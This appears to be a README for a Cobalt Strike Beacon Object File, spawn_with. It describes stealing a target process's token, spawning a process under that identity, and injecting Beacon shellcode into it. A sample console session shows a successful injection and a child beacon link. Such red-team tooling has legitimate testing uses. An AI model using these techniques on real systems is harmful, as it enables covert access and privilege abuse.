An experimental Beacon Object File (BOF) that provides an alternative to the spawnas and inject commands. This exposes a new command, spawn_with [pid] [listener], that performs the following:
- Obtain a handle to the target process.
- Obtain a handle to the process' primary token.
- Duplicate the primary token to an impersonation token.
- Get the Beacon
spawntovalue. - Attempt to spawn a new process with the duplicated token using
CreateProcessWithTokenW.- If this attempt fails, try
CreateProcessAsUserW.
- If this attempt fails, try
- Inject the Beacon shellcode into the spawned process.
- Link to the Beacon in the case of P2P.
beacon> getuid
[*] You are DESKTOP-1U6AHIU\Daniel (admin)
beacon> ps
22656 21972 wordpad.exe x64 1 DESKTOP-1U6AHIU\test_user
beacon> spawnto x64 %windir%\sysnative\notepad.exe
beacon> spawn_with 22656 tcp-local
[*] Task Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444)
[+] received output:
Spawned PID 45668 and injected 297472 bytes
[+] established link to child beacon: 192.168.0.195